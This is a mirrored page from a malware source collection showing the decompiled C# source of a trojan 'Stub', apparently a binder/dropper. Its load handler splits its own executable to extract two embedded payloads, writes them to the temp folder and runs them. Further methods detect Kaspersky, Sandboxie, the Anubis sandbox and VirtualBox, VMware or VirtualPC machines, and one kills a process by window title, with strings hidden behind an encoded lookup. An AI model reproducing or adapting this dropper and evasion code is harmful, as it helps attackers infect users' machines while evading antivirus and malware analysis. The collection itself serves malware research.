mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-27 12:35:07 +00:00
452 lines
12 KiB
C#
452 lines
12 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Stub.Form1
|
|||
|
// Assembly: Stub, Version=4.9.5.9, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 2229516C-329C-43F8-8C26-63983DECBF21
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.lqpj-3f6ac9dfded1ed0e4c086ec75e7c0ca5a7edfa21307d3cb5a21e884ebe389389.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.ComponentModel;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Drawing;
|
|||
|
using System.IO;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace Stub
|
|||
|
{
|
|||
|
[DesignerGenerated]
|
|||
|
public class Form1 : Form
|
|||
|
{
|
|||
|
private IContainer \u0002;
|
|||
|
private object \u0003;
|
|||
|
private string \u0005;
|
|||
|
private string \u0008;
|
|||
|
private RegistryKey \u0006;
|
|||
|
private object \u000E;
|
|||
|
private string \u000F;
|
|||
|
|
|||
|
public Form1()
|
|||
|
{
|
|||
|
this.Load += new EventHandler(this.\u0002);
|
|||
|
this.\u0008 = \u000E.\u0002(-374349334);
|
|||
|
this.\u0006 = Registry.LocalMachine.OpenSubKey(\u000E.\u0002(-374349564), false);
|
|||
|
this.\u000E = RuntimeHelpers.GetObjectValue(this.\u0006.GetValue(\u000E.\u0002(-374349481)));
|
|||
|
this.\u000F = \u000E.\u0002(-374349497);
|
|||
|
this.\u0002();
|
|||
|
}
|
|||
|
|
|||
|
[DebuggerNonUserCode]
|
|||
|
protected override void Dispose(bool disposing)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (!disposing || this.\u0002 == null)
|
|||
|
return;
|
|||
|
this.\u0002.Dispose();
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
base.Dispose(disposing);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
[DebuggerStepThrough]
|
|||
|
private void \u0002()
|
|||
|
{
|
|||
|
this.SuspendLayout();
|
|||
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|||
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|||
|
this.ClientSize = new Size(284, 262);
|
|||
|
this.Name = \u000E.\u0002(-374349467);
|
|||
|
this.Text = \u000E.\u0002(-374349467);
|
|||
|
this.ResumeLayout(false);
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
private void \u0002(object _param1, EventArgs _param2)
|
|||
|
{
|
|||
|
label_0:
|
|||
|
int num1;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 1;
|
|||
|
label_1:
|
|||
|
int num3 = 2;
|
|||
|
string tempPath = Path.GetTempPath();
|
|||
|
label_2:
|
|||
|
num3 = 3;
|
|||
|
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared);
|
|||
|
label_3:
|
|||
|
num3 = 4;
|
|||
|
string Expression = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
label_4:
|
|||
|
num3 = 5;
|
|||
|
FileSystem.FileGet(1, ref Expression);
|
|||
|
label_5:
|
|||
|
num3 = 6;
|
|||
|
FileSystem.FileClose(1);
|
|||
|
label_6:
|
|||
|
num3 = 7;
|
|||
|
string[] strArray = Strings.Split(Expression, \u000E.\u0002(-374349679));
|
|||
|
label_7:
|
|||
|
num3 = 8;
|
|||
|
FileSystem.FileOpen(3, tempPath + strArray[3], OpenMode.Binary, OpenAccess.ReadWrite);
|
|||
|
label_8:
|
|||
|
num3 = 9;
|
|||
|
FileSystem.FilePut(3, strArray[1], -1L, false);
|
|||
|
label_9:
|
|||
|
num3 = 10;
|
|||
|
FileSystem.FileClose(3);
|
|||
|
label_10:
|
|||
|
num3 = 11;
|
|||
|
FileSystem.FileOpen(5, tempPath + strArray[4], OpenMode.Binary, OpenAccess.ReadWrite);
|
|||
|
label_11:
|
|||
|
num3 = 12;
|
|||
|
FileSystem.FilePut(5, strArray[2], -1L, false);
|
|||
|
label_12:
|
|||
|
num3 = 13;
|
|||
|
FileSystem.FileClose(5);
|
|||
|
label_13:
|
|||
|
num3 = 14;
|
|||
|
Process.Start(tempPath + strArray[3]);
|
|||
|
label_14:
|
|||
|
num3 = 15;
|
|||
|
Process.Start(tempPath + strArray[4]);
|
|||
|
label_15:
|
|||
|
num3 = 16;
|
|||
|
this.Close();
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_22;
|
|||
|
label_17:
|
|||
|
num2 = num3;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 1:
|
|||
|
int num4 = num2 + 1;
|
|||
|
num2 = 0;
|
|||
|
switch (num4)
|
|||
|
{
|
|||
|
case 1:
|
|||
|
goto label_0;
|
|||
|
case 2:
|
|||
|
goto label_1;
|
|||
|
case 3:
|
|||
|
goto label_2;
|
|||
|
case 4:
|
|||
|
goto label_3;
|
|||
|
case 5:
|
|||
|
goto label_4;
|
|||
|
case 6:
|
|||
|
goto label_5;
|
|||
|
case 7:
|
|||
|
goto label_6;
|
|||
|
case 8:
|
|||
|
goto label_7;
|
|||
|
case 9:
|
|||
|
goto label_8;
|
|||
|
case 10:
|
|||
|
goto label_9;
|
|||
|
case 11:
|
|||
|
goto label_10;
|
|||
|
case 12:
|
|||
|
goto label_11;
|
|||
|
case 13:
|
|||
|
goto label_12;
|
|||
|
case 14:
|
|||
|
goto label_13;
|
|||
|
case 15:
|
|||
|
goto label_14;
|
|||
|
case 16:
|
|||
|
goto label_15;
|
|||
|
case 17:
|
|||
|
goto label_22;
|
|||
|
}
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_17;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_22:
|
|||
|
if (num2 == 0)
|
|||
|
return;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
public bool antiKAV()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
flag = Process.GetProcessesByName(\u000E.\u0002(-374349682)).Length >= 1;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
private void \u0003()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int index = 0;
|
|||
|
while (index < processes.Length)
|
|||
|
{
|
|||
|
Process process = processes[index];
|
|||
|
if (string.Equals(process.MainWindowTitle, \u000E.\u0002(-374349640)))
|
|||
|
process.Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
public bool antiSandboxie()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
flag = Process.GetProcessesByName(\u000E.\u0002(-374349603)).Length >= 1;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
public bool antiAnubis()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
flag = Operators.CompareString(Application.ExecutablePath, Application.StartupPath + \u000E.\u0002(-374349621), false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
public bool antiAnubis2()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
flag = Operators.ConditionalCompareObjectEqual(this.\u000E, (object) this.\u000F, false);
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
public bool AntiVirtualBox()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
this.\u0005();
|
|||
|
flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349571), false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
public bool AntiVmWare()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
this.\u0005();
|
|||
|
flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349793), false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
public bool AntiVirtualPC()
|
|||
|
{
|
|||
|
int num1;
|
|||
|
bool flag;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = 2;
|
|||
|
this.\u0005();
|
|||
|
flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349820), false) == 0;
|
|||
|
goto label_7;
|
|||
|
label_2:
|
|||
|
num2 = -1;
|
|||
|
switch (num1)
|
|||
|
{
|
|||
|
case 2:
|
|||
|
ProjectData.EndApp();
|
|||
|
goto label_7;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_7:
|
|||
|
int num3 = flag ? 1 : 0;
|
|||
|
if (num2 == 0)
|
|||
|
return num3 != 0;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
return num3 != 0;
|
|||
|
}
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
private void \u0005()
|
|||
|
{
|
|||
|
// ISSUE: unable to decompile the method.
|
|||
|
}
|
|||
|
}
|
|||
|
}
|